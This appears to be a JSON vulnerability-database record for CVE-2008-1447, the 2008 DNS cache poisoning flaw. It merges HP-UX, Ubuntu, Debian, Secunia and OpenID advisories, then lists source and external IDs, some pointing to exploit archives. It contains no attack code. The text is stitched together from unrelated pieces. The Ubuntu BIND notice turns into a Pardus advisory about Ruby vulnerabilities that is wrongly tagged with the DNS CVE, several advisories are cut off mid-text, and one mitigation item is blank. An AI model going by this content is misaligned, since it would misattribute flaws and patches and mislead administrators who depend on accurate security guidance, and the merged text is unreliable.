Response Team\n\nVULNERABILITY SUMMARY\nA potential security vulnerability has been identified with HP-UX running BIND. \nHP-UX B.11.11, B.11.23, B.11.31 running BIND v9.3.2 or BIND v9.2.0, HP-UX B.11.11 running BIND v8.1.2 \n\nBACKGROUND\n\nCVSS 2.0 Base Metrics \n===============================================\nReference                         Base Vector               Base Score \nCVE-2008-1447      (AV:N/AC:L/Au:N/C:P/I:P/A:P)     7.5\n===============================================\nInformation on CVSS is documented in HP Customer Notice: HPSN-2008-002. \n\nRESOLUTION\n\nHP has provided the following software updates / patch to resolve the vulnerabilities for BIND v9.2.0 and BIND v9.3.2. \n\nCustomers running BIND v8.1.2 on HP-UX B.11.11 should upgrade to BIND v9.2.0 or BIND v9.3.2 and apply the updates listed below. \n\nThe BIND v9.2.0 update is available for download from: ftp://ss080058:ss080058@hprc.external.hp.com \n\nThe patch PHNE_37865 is available from: http://itrc.hp.com \n\nThe BIND v9.3.2 updates are available for download from: http://software.hp.com \n\n \nHP-UX Release - B.11.11 running v8.1.2\nAction - Upgrade to BIND v9.2.0 or BIND v9.3.2 and apply the updates listed below \n \nHP-UX Release - B.11.11 running v9.2.0\nBIND Depot name - BIND920v11.depot\n MD5 Sum - F6999280DE19645EF86FF52083AACD72\n \nHP-UX Release - B.11.23 running v9.2.0 \nAction - Install PHNE_37865\n\nHP-UX Release - B.11.11 running v9.3.2\nAction - Install revision C.9.3.2.3.0 or subsequent \n \nHP-UX Release - B.11.23 running v9.3.2\nAction - Install revision C.9.3.2.3.0 or subsequent\n \nHP-UX Release - B.11.31 running v9.3.2\nAction - Install revision C.9.3.2.3.0 or subsequent\n\nNote: HP is aware of performance issues with these updates / patch. All customers should test the updates / patch in their environment. HP is investigating changes to reduce the performance issues. This bulletin will be revised when new updates / patch become available. \n\nMANUAL ACTIONS: Yes - NonUpdate \nFor B.11.11 running v8.1.2, upgrade to BIND v9.2.0 or BIND v9.3.2 and apply the updates \nFor B.11.11 running v9.2.0 install BIND920v11.depot \n\nPRODUCT SPECIFIC INFORMATION \nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all HP-issued Security Bulletins and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa \n\nAFFECTED VERSIONS \n\nFor BIND v8.1.2 \nHP-UX B.11.11 \n============= \nInternetSrvcs.INETSVCS-RUN \naction: upgrade to BIND v9.2.0 or BIND v9.3.2 and apply the updates \n\nFor BIND v9.3.2 \nHP-UX B.11.11 \n============= \nBindUpgrade.BIND-UPGRADE \naction: install revision C.9.3.2.3.0 or subsequent \nURL: http://software.hp.com \n\nHP-UX B.11.23 \n============= \nBindUpgrade.BIND-UPGRADE \nBindUpgrade.BIND2-UPGRADE \naction: install revision C.9.3.2.3.0 or subsequent \nURL: http://software.hp.com \n\nHP-UX B.11.31 \n============= \nNameService.BIND-AUX \nNameService.BIND-RUN \naction: install revision C.9.3.2.3.0 or subsequent \nURL: http://software.hp.com \n\nFor BIND v9.2.0 \nHP-UX B.11.11 \n============= \nBINDv920.INETSVCS-BIND \naction: install revision B.11.11.01.011 or subsequent \nURL: ftp://ss080058:ss080058@hprc.external.hp.com \n\nHP-UX B.11.23 \n============= \nInternetSrvcs.INETSVCS-INETD \nInternetSrvcs.INETSVCS-RUN \nInternetSrvcs.INETSVCS2-RUN \naction: install patch PHNE_37865 or subsequent \nURL: http://itrc.hp.com \n\nEND AFFECTED VERSIONS \n\nHISTORY \nVersion:1 (rev.1) - 16 July 2008 Initial release \nVersion:2 (rev.2) - 19 July 2008 Added BIND v9.2.0 depot information \nVersion:3 (rev.3) - 06 August 2008 Updated patch location, revised BIND v9.2.0 depot information, added BIND v8.1.2 \n\nThird Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer\u0027s patch management policy. \n\nSupport: For further information, contact normal HP Services support channel. \n\nReport: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com \nIt is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. \nTo get the security-alert PGP key, please send an e-mail message as follows:\n  To: security-alert@hp.com \n  Subject: get key\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletins via Email: \nhttp://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA\u0026langcode=USENG\u0026jumpid=in_SC-GEN__driverITRC\u0026topiccode=ITRC \nOn the web page: ITRC security bulletins and patch sign-up \nUnder Step1: your ITRC security bulletins and patches \n  - check ALL categories for which alerts are required and continue. \nUnder Step2: your ITRC operating systems \n  - verify your operating system selections are checked and save. \n\n\nTo update an existing subscription: http://h30046.www3.hp.com/subSignIn.php \nLog in on the web page: Subscriber\u0027s choice for Business: sign-in. \nOn the web page: Subscriber\u0027s Choice: your profile summary - use Edit Profile to update appropriate sections. \n\n\nTo review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do \n\n\n* The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title: \n\nGN = HP General SW\nMA = HP Management Agents\nMI = Misc. 3rd Party SW\nMP = HP MPE/iX\nNS = HP NonStop Servers\nOV = HP OpenVMS\nPI = HP Printing \u0026 Imaging\nST = HP Storage SW\nTL = HP Trusted Linux\nTU = HP Tru64 UNIX\nUX = HP-UX\nVV = HP VirtualVault\n \nSystem management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions. \n\n\n\"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user\u0027s use or disregard of the information provided in this Bulletin. \n\nHewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. =========================================================== \nUbuntu Security Notice USN-622-1              July 08, 2008\nbind9 vulnerability\nCVE-2008-1447\n===========================================================\n\nA security issue affects the following Ubuntu releases:\n\nUbuntu 6.06 LTS\nUbuntu 7.04\nUbuntu 7.10\nUbuntu 8.04 LTS\n\nThis advisory also applies to the corresponding versions of\nKubuntu, Edubuntu, and Xubuntu. \n\nThe problem can be corrected by upgrading your system to the\nfollowing package versions:\n\nUbuntu 6.06 LTS:\n  libdns21                        1:9.3.2-2ubuntu1.5\n\nUbuntu 7.04:\n  libdns22                        1:9.3.4-2ubuntu2.3\n\nUbuntu 7.10:\n  libdns32                        1:9.4.1-P1-3ubuntu2\n\nUbuntu 8.04 LTS:\n  libdns35                        1:9.4.2-10ubuntu0.1\n\nIn general, a standard system upgrade is sufficient to effect the\nnecessary changes. \n\nDetails follow:\n\nDan Kaminsky discovered weaknesses in the DNS protocol as implemented\nby Bind. \n\n\nDescription\n===========\n\n== Several vulnerabilities in safe level ==\n\nMultiple errors in the implementation of safe level restrictions can be\nexploited to call \"untrace_var()\", perform syslog operations, and modify\n\"$PROGRAM_NAME\" at safe level 4, or call insecure methods at safe levels\n1 through 3. \n\n(These vulnerabilities were reported by Keita Yamaguchi.)\n\n\n== DoS vulnerability in WEBrick ==\n\nAn   error exists   in   the   usage   of   regular   expressions   in\n\"WEBrick::HTTPUtils.split_header_value()\".  This can  be  exploited  to\nconsume large amounts of CPU via a specially crafted HTTP request. \n\n(This vulnerability was reported by Christian Neukirchen.)\n\n\n== Lack of taintness check in dl ==\n\nAn error in \"DL\" can be exploited to bypass security  restrictions  and\ncall potentially dangerous functions. \n\n(This vulnerability was reported by Tanaka Akira.)\n\n\nAffected packages:\n\n   Pardus 2008:\n     ruby, all before 1.8.7_p72-16-4\n     ruby-mode, all before 1.8.7_p72-16-4\n\n   Pardus 2007:\n     ruby, all before 1.8.7_p72-16-13\n     ruby-mode, all before 1.8.7_p72-16-4\n\n\n\nResolution\n==========\n\nThere are update(s) for ruby, ruby-mode. You can update them via Package\nManager or with a single command from console:\n\n   Pardus 2008:\n     pisi up ruby ruby-mode\n\n   Pardus 2007:\n     pisi up ruby ruby-mode\n\n\nReferences\n==========\n\n   * http://www.ruby-lang.org/en/news/2008/08/08/multiple-vulnerabilities-in-ruby\n   * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447\n   * http://secunia.com/advisories/31430/\n\n------------------------------------------------------------------------\n\n-- \nP\u0131nar Yanarda\u011f\nhttp://pinguar.org\n\n\n_______________________________________________\nFull-Disclosure - We believe in it.  There are two ways to deal with this situation:\n\n1.  The documentation included with BIND 9 contains a\nmigration guide. Configure the BIND 8 resolver to forward queries to a BIND 9\nresolver.  Provided that the network between both resolvers is trusted,\nthis protects the BIND 8 resolver from cache poisoning attacks (to the\nsame degree that the BIND 9 resolver is protected).  It is theoretically possible to safely use\nBIND 8 in this way, but updating to BIND 9 is strongly recommended. \nBIND 8 (that is, the bind package) will be removed from the etch\ndistribution in a future point release.  Scott\nKitterman noted that python-dns is vulnerable to this predictability,\nas it randomizes neither its transaction ID nor its source port. \nTaken together, this lack of entropy leaves applications using\npython-dns to perform DNS queries highly susceptible to response\nforgery. \n\n----------------------------------------------------------------------\n\nTry a new way to discover vulnerabilities that ALREADY EXIST in your\nIT infrastructure. \n\nThe Full Featured Secunia Network Software Inspector (NSI) is now\navailable:\nhttp://secunia.com/network_software_inspector/\n\nThe Secunia NSI enables you to INSPECT, DISCOVER, and DOCUMENT\nvulnerabilities in more than 4,000 different Windows applications. \n\n----------------------------------------------------------------------\n\nTITLE:\nRed Hat update for bind\n\nSECUNIA ADVISORY ID:\nSA26195\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/26195/\n\nCRITICAL:\nModerately critical\n\nIMPACT:\nSpoofing\n\nWHERE:\n\u003eFrom remote\n\nOPERATING SYSTEM:\nRed Hat Enterprise Linux (v. 5 server)\nhttp://secunia.com/product/13652/\nRed Hat Enterprise Linux Desktop (v. 5 client)\nhttp://secunia.com/product/13653/\nRed Hat Enterprise Linux Desktop Workstation (v. 5 client)\nhttp://secunia.com/product/13651/\nRedHat Enterprise Linux AS 2.1\nhttp://secunia.com/product/48/\nRedHat Enterprise Linux AS 3\nhttp://secunia.com/product/2534/\nRedHat Enterprise Linux AS 4\nhttp://secunia.com/product/4669/\nRedHat Enterprise Linux ES 2.1\nhttp://secunia.com/product/1306/\nRedHat Enterprise Linux ES 3\nhttp://secunia.com/product/2535/\nRedHat Enterprise Linux ES 4\nhttp://secunia.com/product/4668/\nRedHat Enterprise Linux WS 3\nhttp://secunia.com/product/2536/\nRedHat Enterprise Linux WS 2.1\nhttp://secunia.com/product/1044/\nRedHat Enterprise Linux WS 4\nhttp://secunia.com/product/4670/\nRedHat Linux Advanced Workstation 2.1 for Itanium\nhttp://secunia.com/product/1326/\n\nDESCRIPTION:\nRed Hat has issued an update for bind. \n\nFor more information:\nSA26152\n\nSOLUTION:\nUpdated packages are available from Red Hat Network. \nhttp://rhn.redhat.com\n\nORIGINAL ADVISORY:\nhttp://rhn.redhat.com/errata/RHSA-2007-0740.html\n\nOTHER REFERENCES:\nSA26152:\nhttp://secunia.com/advisories/26152/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. Security Advisory (08-AUG-2008) (CVE-2008-3280)\n===============================================\n\nBen Laurie of Google\u0027s Applied Security team, while working with an\nexternal researcher, Dr. Richard Clayton of the Computer Laboratory,\nCambridge University, found that various OpenID Providers (OPs) had\nTLS Server Certificates that used weak keys, as a result of the Debian\nPredictable Random Number Generator (CVE-2008-0166). \n\nIn combination with the DNS Cache Poisoning issue (CVE-2008-1447) and\nthe fact that almost all SSL/TLS implementations do not consult CRLs\n(currently an untracked issue), this means that it is impossible to\nrely on these OPs. \n\nAttack Description\n------------------\n\nIn order to mount an attack against a vulnerable OP, the attacker\nfirst finds the private key corresponding to the weak TLS\ncertificate. He then sets up a website masquerading as the original\nOP, both for the OpenID protocol and also for HTTP/HTTPS. \n\nThere are two cases, one is where the victim is a user trying to\nidentify themselves, in which case, even if they use HTTPS to \"ensure\"\nthat the site they are visiting is indeed their provider, they will be\nunable to detect the substitution and will give their login\ncredentials to the attacker. \n\nThe second case is where the victim is the Relying Party (RP). In this\ncase, even if the RP uses TLS to connect to the OP, as is recommended\nfor higher assurance, he will not be defended, as the vast majority of\nOpenID implementations do not check CRLs, and will, therefore, accept\nthe malicious site as the true OP. \n\nMitigation\n----------\n\nMitigation is surprisingly hard. In theory the vulnerable site should\nrevoke their weak certificate and issue a new one. \n\nHowever, since the CRLs will almost certainly not be checked, this\nmeans the site will still be vulnerable to attack for the lifetime of\nthe certificate (and perhaps beyond, depending on user\nbehaviour). Note that shutting down the site DOES NOT prevent the\nattack. \n\nTherefore mitigation falls to other parties. \n\n1. Browsers must check CRLs by default. \n\n2. OpenID libraries must check CRLs. \n\n3. \n\n4. Until either 1 and 2 or 3 have been done, OpenID cannot be trusted\n   for any OP that cannot demonstrate it has never had a weak\n   certificate. \n\nDiscussion\n----------\n\nNormally, when security problems are encountered with a single piece\nof software, the responsible thing to do is to is to wait until fixes\nare available before making any announcement. However, as a number of\nexamples in the past have demonstrated, this approach does not work\nparticularly well when many different pieces of software are involved\nbecause it is necessary to coordinate a simultaneous release of the\nfixes, whilst hoping that the very large number of people involved\nwill cooperate in keeping the vulnerability secret. \n\nIn the present situation, the fixes will involve considerable\ndevelopment work in adding CRL handling to a great many pieces of\nopenID code. This is a far from trivial amount of work. \n\nThe fixes will also involve changes to browser preferences to ensure\nthat CRLs are checked by default -- which many vendors have resisted\nfor years. We are extremely pessimistic that a security vulnerability\nin OpenID will be seen as sufficiently important to change the browser\nvendors minds. \n\nHence, we see no value in delaying this announcement; and by making\nthe details public as soon as possible, we believe that individuals\nwho rely on OpenID will be better able to take their own individual\nsteps to avoid relying upon the flawed certificates we have\nidentified. \n\nOpenID is at heart quite a weak protocol, when used in its most\ngeneral form[1], and consequently there is very limited reliance upon\nits security. This means that the consequences of the combination of\nattacks that are now possible is nothing like as serious as might\notherwise have been the case. \n\nHowever, it does give an insight into the type of security disaster\nthat may occur in the future if we do not start to take CRLs\nseriously, but merely stick them onto \"to-do\" lists or disable them in\nthe name of tiny performance improvements. \n\nAffected Sites\n--------------\n\nThere is no central registry of OpenID systems, and so we cannot be\nsure that we have identified all of the weak certificates that are\ncurrently being served. The list of those we have found so far is:\n\nopenid.sun.com\nwww.xopenid.net\nopenid.net.nz\n\nNotes\n-----\n\n[1] There are ways of using OpenID that are significantly more secure\n    than the commonly deployed scheme, I shall describe those in a\n    separate article. \n\n_______________________________________________\nFull-Disclosure - We believe in it. \nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\nHosted and sponsored by Secunia - http://secunia.com/\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2008-1447"
          },
          {
            "db": "CERT/CC",
            "id": "VU#800113"
          },
          {
            "db": "CERT/CC",
            "id": "VU#252735"
          },
          {
            "db": "VULHUB",
            "id": "VHN-31572"
          },
          {
            "db": "PACKETSTORM",
            "id": "68039"
          },
          {
            "db": "PACKETSTORM",
            "id": "68068"
          },
          {
            "db": "PACKETSTORM",
            "id": "73732"
          },
          {
            "db": "PACKETSTORM",
            "id": "68288"
          },
          {
            "db": "PACKETSTORM",
            "id": "68691"
          },
          {
            "db": "PACKETSTORM",
            "id": "68878"
          },
          {
            "db": "PACKETSTORM",
            "id": "68063"
          },
          {
            "db": "PACKETSTORM",
            "id": "69021"
          },
          {
            "db": "PACKETSTORM",
            "id": "68037"
          },
          {
            "db": "PACKETSTORM",
            "id": "68546"
          },
          {
            "db": "PACKETSTORM",
            "id": "58035"
          },
          {
            "db": "PACKETSTORM",
            "id": "68924"
          }
        ],
        "trust": 3.51
      },
      "exploit_availability": {
        "_id": null,
        "data": [
          {
            "reference": "https://www.scap.org.cn/vuln/vhn-31572",
            "trust": 0.1,
            "type": "unknown"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-31572"
          }
        ]
      },
      "external_ids": {
        "_id": null,
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2008-1447",
            "trust": 2.2
          },
          {
            "db": "CERT/CC",
            "id": "VU#800113",
            "trust": 1.9
          },
          {
            "db": "SECUNIA",
            "id": "31430",
            "trust": 1.2
          },
          {
            "db": "VUPEN",
            "id": "ADV-2008-2025",
            "trust": 1.1
          },
          {
            "db": "VUPEN",
            "id": "ADV-2009-0297",
            "trust": 1.1
          },
          {
            "db": "VUPEN",
            "id": "ADV-2008-2334",
            "trust": 1.1
          },
          {
            "db": "VUPEN",
            "id": "ADV-2008-2383",
            "trust": 1.1
          },
          {
            "db": "VUPEN",
            "id": "ADV-2008-2113",
            "trust": 1.1
          },
          {
            "db": "VUPEN",
            "id": "ADV-2008-2558",
            "trust": 1.1
          },
          {
            "db": "VUPEN",
            "id": "ADV-2008-2019",
            "trust": 1.1
          },
          {
            "db": "VUPEN",
            "id": "ADV-2008-2377",
            "trust": 1.1
          },
          {
            "db": "VUPEN",
            "id": "ADV-2008-2584",
            "trust": 1.1
          },
          {
            "db": "VUPEN",
            "id": "ADV-2008-2342",
            "trust": 1.1
          },
          {
            "db": "VUPEN",
            "id": "ADV-2010-0622",
            "trust": 1.1
          },
          {
            "db": "VUPEN",
            "id": "ADV-2008-2166",
            "trust": 1.1
          },
          {
            "db": "VUPEN",
            "id": "ADV-2008-2051",
            "trust": 1.1
          },
          {
            "db": "VUPEN",
            "id": "ADV-2008-2092",
            "trust": 1.1
          },
          {
            "db": "VUPEN",
            "id": "ADV-2008-2029",
            "trust": 1.1
          },
          {
            "db": "VUPEN",
            "id": "ADV-2008-2384",
            "trust": 1.1
          },
          {
            "db": "VUPEN",
            "id": "ADV-2008-2268",
            "trust": 1.1
          },
          {
            "db": "VUPEN",
            "id": "ADV-2008-2052",
            "trust": 1.1
          },
          {
            "db": "VUPEN",
            "id": "ADV-2008-2549",
            "trust": 1.1
          },
          {
            "db": "VUPEN",
            "id": "ADV-2008-2197",
            "trust": 1.1
          },
          {
            "db": "VUPEN",
            "id": "ADV-2009-0311",
            "trust": 1.1
          },
          {
            "db": "VUPEN",
            "id": "ADV-2008-2055",
            "trust": 1.1
          },
          {
            "db": "VUPEN",
            "id": "ADV-2008-2467",
            "trust": 1.1
          },
          {
            "db": "VUPEN",
            "id": "ADV-2008-2123",
            "trust": 1.1
          },
          {
            "db": "VUPEN",
            "id": "ADV-2008-2482",
            "trust": 1.1
          },
          {
            "db": "VUPEN",
            "id": "ADV-2008-2525",
            "trust": 1.1
          },
          {
            "db": "VUPEN",
            "id": "ADV-2008-2023",
            "trust": 1.1
          },
          {
            "db": "VUPEN",
            "id": "ADV-2008-2582",
            "trust": 1.1
          },
          {
            "db": "VUPEN",
            "id": "ADV-2008-2114",
            "trust": 1.1
          },
          {
            "db": "VUPEN",
            "id": "ADV-2008-2196",
            "trust": 1.1
          },
          {
            "db": "VUPEN",
            "id": "ADV-2008-2139",
            "trust": 1.1
          },
          {
            "db": "VUPEN",
            "id": "ADV-2008-2466",
            "trust": 1.1
          },
          {
            "db": "VUPEN",
            "id": "ADV-2008-2050",
            "trust": 1.1
          },
          {
            "db": "VUPEN",
            "id": "ADV-2008-2195",
            "trust": 1.1
          },
          {
            "db": "VUPEN",
            "id": "ADV-2008-2291",
            "trust": 1.1
          },
          {
            "db": "VUPEN",
            "id": "ADV-2008-2030",
            "trust": 1.1
          },
          {
            "db": "SECTRACK",
            "id": "1020548",
            "trust": 1.1
          },
          {
            "db": "SECTRACK",
            "id": "1020578",
            "trust": 1.1
          },
          {
            "db": "SECTRACK",
            "id": "1020448",
            "trust": 1.1
          },
          {
            "db": "SECTRACK",
            "id": "1020558",
            "trust": 1.1
          },
          {
            "db": "SECTRACK",
            "id": "1020702",
            "trust": 1.1
          },
          {
            "db": "SECTRACK",
            "id": "1020440",
            "trust": 1.1
          },
          {
            "db": "SECTRACK",
            "id": "1020575",
            "trust": 1.1
          },
          {
            "db": "SECTRACK",
            "id": "1020437",
            "trust": 1.1
          },
          {
            "db": "SECTRACK",
            "id": "1020802",
            "trust": 1.1
          },
          {
            "db": "SECTRACK",
            "id": "1020449",
            "trust": 1.1
          },
          {
            "db": "SECTRACK",
            "id": "1020579",
            "trust": 1.1
          },
          {
            "db": "SECTRACK",
            "id": "1020561",
            "trust": 1.1
          },
          {
            "db": "SECTRACK",
            "id": "1020804",
            "trust": 1.1
          },
          {
            "db": "SECTRACK",
            "id": "1020577",
            "trust": 1.1
          },
          {
            "db": "SECTRACK",
            "id": "1020560",
            "trust": 1.1
          },
          {
            "db": "SECTRACK",
            "id": "1020651",
            "trust": 1.1
          },
          {
            "db": "SECTRACK",
            "id": "1020653",
            "trust": 1.1
          },
          {
            "db": "SECTRACK",
            "id": "1020438",
            "trust": 1.1
          },
          {
            "db": "SECTRACK",
            "id": "1020576",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "31209",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "31197",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "31422",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "30977",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "31151",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "31354",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "31093",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "31212",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "31207",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "31221",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "31254",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "31451",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "31169",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "30988",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "30973",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "31687",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "31199",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "30980",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "31137",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "30998",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "31014",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "31065",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "31882",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "31019",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "31153",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "31482",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "31495",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "33178",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "33714",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "31213",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "31326",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "31052",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "31011",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "31588",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "31033",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "31031",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "30979",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "31022",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "31094",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "31030",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "31204",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "30925",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "31072",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "31152",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "31237",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "31012",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "33786",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "31143",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "31236",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "31900",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "30989",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "31823",
            "trust": 1.1
          },
          {
            "db": "USCERT",
            "id": "TA08-190B",
            "trust": 1.1
          },
          {
            "db": "USCERT",
            "id": "TA08-260A",
            "trust": 1.1
          },
          {
            "db": "USCERT",
            "id": "TA08-190A",
            "trust": 1.1
          },
          {
            "db": "BID",
            "id": "30131",
            "trust": 1.1
          },
          {
            "db": "EXPLOIT-DB",
            "id": "6130",
            "trust": 1.1
          },
          {
            "db": "EXPLOIT-DB",
            "id": "6123",
            "trust": 1.1
          },
          {
            "db": "EXPLOIT-DB",
            "id": "6122",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "26195",
            "trust": 0.9
          },
          {
            "db": "EXPLOIT-DB",
            "id": "4266",
            "trust": 0.8
          },
          {
            "db": "CERT/CC",
            "id": "VU#252735",
            "trust": 0.8
          },
          {
            "db": "PACKETSTORM",
            "id": "68878",
            "trust": 0.2
          },
          {
            "db": "PACKETSTORM",
            "id": "68288",
            "trust": 0.2
          },
          {
            "db": "PACKETSTORM",
            "id": "68068",
            "trust": 0.2
          },
          {
            "db": "PACKETSTORM",
            "id": "73732",
            "trust": 0.2
          },
          {
            "db": "PACKETSTORM",
            "id": "68039",
            "trust": 0.2
          },
          {
            "db": "PACKETSTORM",
            "id": "68691",
            "trust": 0.2
          },
          {
            "db": "PACKETSTORM",
            "id": "68037",
            "trust": 0.2
          },
          {
            "db": "PACKETSTORM",
            "id": "68546",
            "trust": 0.2
          },
          {
            "db": "PACKETSTORM",
            "id": "68063",
            "trust": 0.2
          },
          {
            "db": "PACKETSTORM",
            "id": "68038",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "68755",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "68412",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "68118",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "73060",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "68502",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "68061",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "74443",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "96747",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "94774",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "68199",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "68183",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "68471",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "70207",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "68036",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "68500",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "68360",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "68473",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "68129",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "68554",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "68543",
            "trust": 0.1
          },
          {
            "db": "SEEBUG",
            "id": "SSVID-65607",
            "trust": 0.1
          },
          {
            "db": "VULHUB",
            "id": "VHN-31572",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "69021",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "58035",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "68924",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#800113"
          },
          {
            "db": "CERT/CC",
            "id": "VU#252735"
          },
          {
            "db": "VULHUB",
            "id": "VHN-31572"
          },
          {
            "db": "PACKETSTORM",
            "id": "68039"
          },
          {
            "db": "PACKETSTORM",
            "id": "68068"
          },
          {
            "db": "PACKETSTORM",
            "id": "73732"
          },
          {
            "db": "PACKETSTORM",
            "id": "68288"
          },
          {
            "db": "PACKETSTORM",
            "id": "68691"
          },
          {
            "db": "PACKETSTORM",
            "id": "68878"
          },
          {
            "db": "PACKETSTORM",
            "id": "68063"
          },
